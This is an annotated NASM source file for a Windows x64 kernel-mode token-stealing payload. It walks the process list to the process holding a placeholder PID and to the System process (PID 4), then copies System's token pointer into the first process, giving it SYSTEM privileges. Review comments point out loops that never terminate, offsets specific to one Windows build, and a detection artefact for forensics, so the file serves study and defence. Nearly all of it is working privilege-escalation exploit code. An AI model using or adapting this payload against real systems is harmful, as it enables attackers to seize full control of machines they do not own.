[BITS 64] | |
;-----------------------------------------------------------------------
; Windows x64 kernel-mode token-replacement payload (NASM, Intel syntax).
;
; What the visible code does: starting from the current thread's process
; structure, it walks a linked list of process structures twice -- first
; until the dword at +0x2e0 equals the placeholder 0x41414141 (patched in
; by the exploit, per the author's comment), then until that dword equals
; 4 -- and copies the qword at +0x358 from the second hit into the first.
; The author's comments identify +0x2e0 as the PID, +0x2e8 as the
; next-process link and +0x358 as the token pointer; all three offsets,
; plus gs:0x188 and +0x220, are hard-coded and therefore only valid for
; the specific Windows build they were taken from (not determinable here).
;
; In:    rax/rbx/rcx/rsi/rdi are saved on entry and restored on exit;
;        no other registers or memory are touched. Flags are clobbered.
; Out:   none (no ret -- see the trailing comment; the exploit context
;        supplies the return).
; NOTE(review): neither search loop has a termination condition; if no
;        list entry matches, execution never leaves the loop.
; NOTE(review): rsi and rdi are saved/restored but never used in the
;        visible code.
; Detection/forensics angle: after this runs, two process structures
;        reference the same token object (one of them PID 4's). Kernel
;        memory integrity tooling that cross-checks EPROCESS token
;        pointers against the owning process can flag this state.
;-----------------------------------------------------------------------
; Preserve the registers this code uses (restored in reverse order below).
push rax | |
push rbx | |
push rcx | |
push rsi | |
push rdi | |
; gs base is the per-processor KPCR in x64 kernel mode; the author reads
; the CurrentThread pointer at gs:0x188 (0x180 + 8) -- offset is
; build-specific, confirm against the target's KPRCB layout.
mov rax, [gs:0x180 + 0x8] ; Get 'CurrentThread' from KPRCB | |
; rax = thread->Process (offset 0x220 per the author; build-specific).
mov rax, [rax + 0x220] ; Get 'Process' property from current thread | |
; Loop 1: rax = current process structure; advance until the dword at
; +0x2e0 (PID, per author) equals the exploit-patched placeholder.
next_process: | |
cmp dword [rax + 0x2e0], 0x41414141 ; Search for 'cmd.exe' process ('AAAA' replaced by exploit) | |
je found_cmd_process | |
; Follow the link at +0x2e8, then subtract the link's own offset to get
; back to the start of the next structure (CONTAINING_RECORD pattern).
mov rax, [rax + 0x2e8] ; If not found, go to next process | |
sub rax, 0x2e8 | |
jmp next_process | |
found_cmd_process: | |
; rbx = the matching (target) process structure; rax keeps walking.
mov rbx, rax ; Save our cmd.exe EPROCESS for later | |
; Loop 2: same walk, this time stopping at PID 4 (the System process,
; per author). Same non-terminating behaviour if no entry matches.
find_system_process: | |
cmp dword [rax + 0x2e0], 0x00000004 ; Search for PID 4 (System process) | |
je found_system_process | |
mov rax, [rax + 0x2e8] | |
sub rax, 0x2e8 | |
jmp find_system_process | |
found_system_process: | |
; Copy the qword at +0x358 (token pointer, per author) verbatim from the
; PID-4 structure (rax) into the target structure (rbx). Both processes
; now reference the same token object, which is the observable artefact.
mov rcx, [rax + 0x358] ; Take TOKEN from System process | |
mov [rbx+0x358], rcx ; And copy it to the cmd.exe process | |
; Restore saved registers in reverse order of the pushes above.
pop rdi | |
pop rsi | |
pop rcx | |
pop rbx | |
pop rax | |
; return goes here |